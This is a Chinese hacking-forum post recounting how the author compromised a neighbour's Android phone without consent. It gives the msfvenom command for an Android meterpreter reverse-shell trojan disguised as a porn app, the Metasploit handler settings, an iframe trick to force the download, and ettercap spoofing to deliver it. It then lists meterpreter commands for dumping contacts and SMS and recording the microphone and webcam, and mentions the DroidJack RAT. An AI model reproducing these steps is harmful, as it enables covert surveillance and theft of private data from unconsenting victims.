找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
返回列表 发新帖
查看: 2506|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

& n s5 C2 G0 m* Z 五、msf+ettercap入侵邻居安卓手机 1 T% r6 Z! Y9 {# \# M6 Y( |! Z9 J

$ ~& _! G" u C& J7 \

/ N ~, c9 @ q( k& y 首先启动msf 1 r5 I+ X2 Q/ L* W

0 s* [1 }/ ~ s) b* c' q0 I; e

- k! T8 o, r o 先用kali生成一个安卓木马,如下命令: % a d# c( _+ b! V7 C% c. ~& [4 {

- v- O3 e1 M! R8 d% J; g( g

! k# F# k! w0 `6 {& c6 s2 ` Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk " e* y* t5 a* n: K

; b( \: f9 Y+ m" w" s+ `$ B: [% G- b

( [( k+ L& M( K$ d; { 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 ' K) A" ]: I# x I

+ L' {. S) Z9 [# V; M: ]

, A/ e% S9 P. ? 然后进入msf , Y3 r2 _6 R4 F* v2 `

6 U: b+ j) E l! G/ ~6 \6 _4 y; p

) e' M1 Y8 q6 k use exploit/multi/handler . |$ \5 D. t1 C2 r% \

" o0 H) \" N/ c2 C

' o. v# n5 l3 o, D |1 Z2 } set payload android/meterpreter/reverse_tcp 2 G+ e! h8 h2 F& E, g

2 X. L2 z( V. V

/ [5 r& M5 H6 {) n; P- t set LHOST 192.168.0.109 //ipkailiip ( _; m% m5 ~5 B% {1 {

/ a7 l. F' q; @: q' c) u

1 W ^. K, V8 x( ?% P set LPORT 44444 //端口一定要与前面生成的木马的端口一致 * A: K) l2 q6 @( M" Y5 W# e

4 F& \4 t+ h% n9 Z9 B! U9 v

. r, [6 Z9 Y# L+ g Exploit - @8 [! Y4 [8 [! s' f( q* j

. e, f/ Y8 f% C% z! U

/ W( X! j! ~: S+ ?+ ~ U: x   6 R( S( Q: r% b4 a; W- R7 Q e

" Q' v. |7 J; J$ o, \1 ~

5 b& L9 }. \. J+ C$ P- w9 { 下面我们开启ettercap -G 3 U, Y3 I. L7 y0 ~9 X( v

9 O+ C5 ]+ i4 X' {% F2 C( e. j& B

% T4 g4 B& a$ n7 n' T 我物理IP . p0 U$ B6 s/ R* {

b3 h: N2 G$ t' D( p

+ E. H( `- y* k. j7 I S" F   X; `1 D" a- g0 F

, T8 z- d, R0 L8 {, H* Q

) y' ^8 X4 x4 x( E 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, ( |2 ]3 C3 i( H1 _' G

6 u* p0 n$ T3 ?/ O5 |1 @2 z- b

* I6 U9 p# E" M# a F& J2 ]9 v 下面我们来设置一下 # i4 \5 U, P& ~' G0 l" }& R

5 X- S3 O8 W$ G4 X( H

" t7 ~# p8 }& B3 y8 I   - Y7 z3 x9 R, r) Y1 I+ a% J/ U

- y3 a6 ]# L, O* E( m4 A* q

+ v/ v# m0 [, y |8 U3 @ 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 4 t0 F x2 L: e

8 e: v5 }; l4 Q2 ~8 ~1 v2 ~

1 |4 Y3 L& }2 X   ' \" k6 _$ z o% W) p# x

: Y! C1 J5 {8 ^" ]: _2 S) z6 N

6 U6 M$ o% V9 q' Y* C5 V( Y1 W0 R   3 I0 x9 k* p2 u9 @/ W0 a, G

! B- J( J7 W' `! h. ]

9 i. S' R/ K/ l1 Q9 x# d, v- I/ b   8 l. F5 W2 {+ C

5 e0 @! C& ?4 a+ u- z

! w- e2 q+ p* L% n' K. a+ {   $ ] |& j5 |8 F9 |% Z- H

: [& w$ [" D& d

/ B/ J5 D3 ?$ Z, |/ i) @   7 E5 I$ ~" H5 d. M$ T0 |6 i

+ L/ B7 a+ }: J, a1 g" ^

9 z+ ]. n/ V3 Z8 P. q   , U. U8 q7 [* f) F: z

$ p. x! G0 x c) I

* z; q" u/ Z6 r1 L   : I% q0 U/ A" c2 J& Q9 `% J

1 w- D& R" D+ L$ G9 C% [ r

8 L/ [% B" f$ d/ o/ f. m- i   ! z6 J% r5 J: z( Z6 ~

8 `" t: _% H0 K. d- Y0 h

( a$ b, H* o! Z   8 ]+ ?/ u7 `) c7 k+ j

% E3 r3 z' l s4 D" s( @/ W5 r

: p# \; q; W& g8 X% X+ b* ]0 N3 q   E) a# S( j* V5 F F( a

6 N) c' u! D1 i1 h) w

) h- ~: s5 i; ?$ e% t5 [0 p* Q   & l4 Y9 P* l7 T4 b {# ^8 w

U% V/ X; s% H$ W7 ~. U- D7 @8 y

" |9 |( F& k- B2 D# f' ?. j( U   2 m: h1 W( }# U5 N+ [3 i

& ?4 a9 `& `7 P; t

) m) J9 S$ J& U9 v1 t+ `   ( F# g- E' F$ r; [

2 ^! \7 ?0 Z. B5 V8 s

3 O* d' K7 [+ t! { |4 F- |$ e n \ 下面我们开始攻击 - c: J; a3 o2 ~* x F- J3 o

+ i7 r1 p% v! u% P

2 d8 F9 z4 x+ P: a; H6 m   * p. T4 Y( ^' L

* w) W# q1 s+ s& k9 i* |

l- }* S; ]( |/ y3 Q5 ~8 G6 @   9 X S+ X' I) t8 j

) x/ Y5 t' t* d: _

) W: r. g. {( h( j. h   - p. O3 J! s, I5 A) O) V1 J

6 ?% q! u6 Y8 B7 G* d7 b. y2 o

0 C( x6 E) _# L# @( |* L   ( k) I. ~+ e! {( J4 ] f

: V; Z% ^7 e2 y5 `, D# g1 T! V# m, b

6 i, _8 B2 {" v K   , O2 y& _0 E9 F2 U' X; l# O

' t5 a: t) r" m4 y/ p

. B- [, c/ v# g 大概过了5分钟多,发现反弹成功了 / v* ~7 Y0 b4 [' Q% g# Y6 ]

- d- f0 p0 u1 M: z% ]+ h

! \6 X) T$ Z; j9 t   3 W$ s0 S3 o7 b

2 \4 G& E# f/ u8 q

- q5 d, [1 J1 v/ ?$ a4 y3 j   / ^* l$ X) j% |) d% O1 R S

5 m- I4 W' F& P$ p: Z

$ k' x |3 U% \8 d   ' E8 a6 D9 X6 B* [3 a2 @

0 o* L" y8 n& N8 Z3 u1 f

6 g. Q+ F: G$ N& E. q   . v9 W) A' F& M: ]; {2 Y9 @6 e

- p+ ]5 q( K1 T+ j& t& C* r$ M% n

4 {/ p: D3 p7 V% Y! G$ g, f) h( L   ( M; E. F/ |! L2 v% h5 j$ ]

1 ?3 s K8 X5 ?+ F1 Q

2 U/ g8 Y4 ?: x* w% V   / \+ z* Y% M$ P: \

( [9 h' i7 A) M9 L- W& w4 b6 d

3 Z$ m* h7 v+ E   % a+ g$ I4 T! Q1 Q" h; r

4 Z2 C l q9 F8 X, q2 p

B; `1 ^) B, ~8 m; f 执行命令 $ ~, b+ h, a: w. {% A& Z

3 W; _& K0 B4 j2 J; t5 v5 U: |) N: Q

+ E% M/ Z+ ^, J4 e   . U( [; K8 s9 q

- ^1 n; l& Q7 L* h# T" G6 x

2 b3 u/ y& c+ g4 ?( p dump_contacts    --》这个是导出电话 + X2 W( C3 m; P9 Z2 K- e

7 B4 Z6 g3 x" t2 E) T& c+ a: m$ z7 t

" K+ `4 ]6 I. Q! f+ y+ q dump_sms --》这个是导出信息 4 h1 m9 [# h2 e. F. L3 ]

& }& v5 g5 @( s! g

9 A) a0 }: ?' { record_mic     Record audio from the default microphone for X seconds % S5 z1 ?+ s; C, @# [( p

- v. ]4 z4 \" s5 H! H

: y5 U5 f' E8 z     webcam_chat    Start a video chat ' @* Z3 l L" ?% H

0 t6 R8 N; A \. x# L$ |

6 ? e( S; k5 J- Q$ M0 y( E- Z     webcam_list    List webcams ' c: |. J+ m) R/ P# _- K0 N

4 U1 l* A: s; y

4 q& b+ K+ z' J     webcam_snap    Take a snapshot from the specified webcam 3 G( g u# X/ ^* v) r

9 t0 z' ?* a8 v5 [/ k, c

- d, u3 k+ I. ~$ s/ k( P webcam_stream  lay a video stream from the specified webcam 4 ^, y: U) ^, {" r6 {8 ]( E$ \

% P) v0 N5 M/ m

& m; o% h. t, Z6 F7 x7 Y   7 Z* H" B- C2 z. w, a" L

* H$ N( |) f. L

, s1 _, J# K+ {8 s6 p0 h$ p; o+ p   / Y2 Q! a9 l* Z3 ~" b2 e# ]

* `5 U. z5 _, e+ }& C3 \

) z) v, {5 t8 S) Z8 K. c* M6 ]) \ 我们打开看一下电话薄, 6 x* R( y( f7 T* b

7 Q/ W+ T5 i8 Q0 i6 u

& J2 o. X, k% z! n8 G   + t% d' W: q) i* E. P% ?6 K

$ o, _1 a5 m, h

+ Y: O( [5 }1 j/ l; S5 w! j   3 S b8 g0 y: M. X* `

, d' j% k0 C1 X! @) ?; s

k6 n+ W/ j6 H7 p' }, c- |   $ _6 `% g5 _$ W) D* R# p+ j# l

3 }7 k+ d' I2 k) V! X

+ x( f* n- X) `8 L1 U0 Z   8 l0 c! S3 Y3 J4 F9 X! o1 L5 L

0 U+ m' ?$ K- H$ ]* p7 H5 ?

* ^# e! I+ s" ~7 G& D6 ]   / p# u Z2 I" r I" f- Q

$ z4 U6 G# a/ `7 ^6 p7 C6 @% q

5 g' _ [* ~' d" Y% z   ; K f2 L' [# W: `: |

( l# U' [* i8 E7 Y* i- n

O' z8 ]$ A2 |9 l4 c# V 我们同时欺骗成DroidJack木马,使用方法如图: : u0 h# ~- p& ], e" r* B

; A- a, ~( r% s

" K2 W8 A+ k Q2 ^+ ^   6 L, ~" T, h# ~, R9 \+ d1 t+ t

8 w) b3 E/ B( b' V

# j9 T5 O0 y( N   5 l2 a$ J% k7 V+ M( [- z' \

* v( J$ L+ m7 V& k* C

- X1 H, ~* \" [   9 D6 D5 `3 ^9 D0 }! z! ^

2 j2 n( A+ r( A" v" Y( d, w

: D* ~) e5 {* { 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 + F7 y. L x6 |" `5 r s" S

8 p$ X$ L2 a% A# S6 S

: i* S. D2 h7 T: v* n* K! E   % \5 k2 |* f* Z; r

) n3 N/ N# a% {( N

! I! t) C0 M0 q; P j, ]7 S+ G& r& a   8 E3 `# N2 `* g( G( e0 K

# f! _" ]' ~3 ~7 U7 P# o

5 g& D6 C. i% U! ~2 Q- a   6 ?; M- \7 y/ F2 G. K+ t

3 k* ?* z+ J7 ?

7 E% {3 k. E+ P8 }. f1 B) X4 T - J; t8 `, A0 Y3 G, A+ q+ t7 J: o' X

# ?" }6 K7 } J, a9 p$ X) q' Y

7 l) k1 O9 ?) o: ^" {( p
; N- J* k) \) g4 @# Z

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表